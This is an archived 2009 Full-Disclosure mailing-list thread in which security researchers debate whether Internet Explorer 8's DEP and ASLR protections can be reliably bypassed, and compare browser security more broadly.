Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious fred.vici...@gmail.comwrote: Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features ( http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? Depends. IMHO Non exists the more secure browser, anyway (not exists the more secure software, never ) . But exists the more secure env on which the browser run. There are some difference if i run firefox in windows xp and if i run run firefox within a selinux guest account under Fedora. On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott jared.dem...@harris.comwrote: I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. -- __ Jared D. DeMott Principal Security Researcher -- Best wishes, Freddie Vicious http://twitter.com/viciousf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Yeah that's prrety obvious that there's one way or another to bypass DEP and ASLR but if you chose not to share it and don't have anything useful to say, it'll be better not to say anything. On Thu, Oct 1, 2009 at 12:55 PM, Berend-Jan Wever berendjanwe...@gmail.comwrote: FYI: ASLR DEP can be bypassed on x86, there's just nothing public at the moment. Cheers, SkyLined Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious fred.vici...@gmail.comwrote: Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features ( http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott jared.dem...@harris.comwrote: I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. -- __ Jared D. DeMott Principal Security Researcher -- Best wishes, Freddie Vicious http://twitter.com/viciousf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Best wishes, Freddie Vicious http://twitter.com/viciousf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Freddie Vicious wrote: Microsoft has released Internet Explorer 8 on March 19, 2009 and up to now there's no reliable method to exploit memory corruption vulnerabilities on it? I mean, on IE6 and IE7 we had SkyLined heap spray technique, first seen in the IFRAME overflow exploit [1] which have been used by almost every IE memory corruption exploit so far. Internet Explorer 8 was enhanced with DEP and ASLR protections, making heap spray useless. Then Mark Dowd and Alexander Sotirov published their great paper - Bypassing Browser Memory Protections [2] providing some excellent techniques, mainly the .NET binary technique which bypasses DEP and ASLR which was used by Nils on the latest Pwn2Own to own Internet Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit other vulnerabilities [4]. One day after Nils owned IE8RC, Microsoft released Internet Explorer 8 RTM and blocked the option to load .NET DLL’s from Internet zone and Restricted sites zone. Due to the fact that most of IE exploitation doesn’t occur in Intranet/Trusted sites/Local machine zone, this makes the .NET DLL technique irrelevant most of the times. So my question is - Is there no reliable method to exploit memory corruption vulnerabilities in Internet Explorer 8? I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. [1] http://milw0rm.com/exploits/612 [2] http://taossa.com/archive/bh08sotirovdowd.pdf [3] http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits [4] http://milw0rm.com/exploits/8969 -- Best wishes, Freddie Vicious -- __ Jared D. DeMott Principal Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features ( http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott jared.dem...@harris.comwrote: I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. -- __ Jared D. DeMott Principal Security Researcher -- Best wishes, Freddie Vicious http://twitter.com/viciousf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
FYI: ASLR DEP can be bypassed on x86, there's just nothing public at the moment. Cheers, SkyLined Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious fred.vici...@gmail.comwrote: Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known catch-all technique against IE8. Along with other security features ( http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott jared.dem...@harris.comwrote: I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. -- __ Jared D. DeMott Principal Security Researcher -- Best wishes, Freddie Vicious http://twitter.com/viciousf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
On Thu, 01 Oct 2009 21:55:37 +0200, Berend-Jan Wever said: FYI: ASLR DEP can be bypassed on x86, there's just nothing public at the moment. Is that I believe it can, but there's no proof yet, or based on non-public sources, I know for a fact it can? pgpGarY5dXHrE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Along with other security features (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? If memory serves me right, it's been a while since we've witnessed successful, large-scale exploitation of memory corruption flaws in any browser, and it's probably not the most common exploitable security lapse these days. This is partly because many of the modern defenses - such as DEP/NX, ASLR, canaries, lower privileges / sandboxing - are becoming more prevalent across all browsers and operating systems; partly because browser seem to be doing a lot of in-house fuzzing (for MSIE, Firefox, and Chrome, this is probably pretty evident); and last but not least, in part because of the changing landscape for security disclosure: researchers are heavily incentivized to sell vulnerabilities instead (keeping the public as such generally safe, but probably greatly increasing exposure windows for targeted attacks). In the browser world, many other problems can have profound security consequences, however; browser chrome privilege escalations, zone fenceposts, even universal XSSes (made more serious by the fact more and more of our sensitive data is handled by web applications), and other design errors that allow much simpler paths of privilege escalation (sometimes including system compromise) are taking the center stage, particularly for malware distribution and other large-scale attacks. In this department, most vendors have several skeletons in the closet (Microsoft with content sniffing and zone model complexity, Firefox and some other browsers with privileged JavaScript used to implement extensions and UIs, etc). Anyhow - in the end, I would be tempted to say that the differences between browsers are much less pronounced that the media feels compelled to say; but this new fierce competition between vendors is exceptional, highly notable, and very beneficial for the industry in the long run. For example, weren't it for Firefox claims of superior security and the ensuing market adoption, we would probably not see a sudden push for security features in MSIE8; and weren't it for Microsoft's response, Mozilla folks would likely not feel compelled to keep up their in-house fuzzing efforts and security improvements in FF3 and 3.5. Then add Chrome to the mix, and it gets even more interesting... /mz PS. As for malware filtering - also, not a feature unique to any particular browser these days - I do not quite see the relevance to this discussion. Anti-malware checks improve the safety of casual browsing for general public - and hence has a positive effect for the health of the Internet as a whole - but they do not render any particular browser less likely to have exploitable vulnerabilities. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/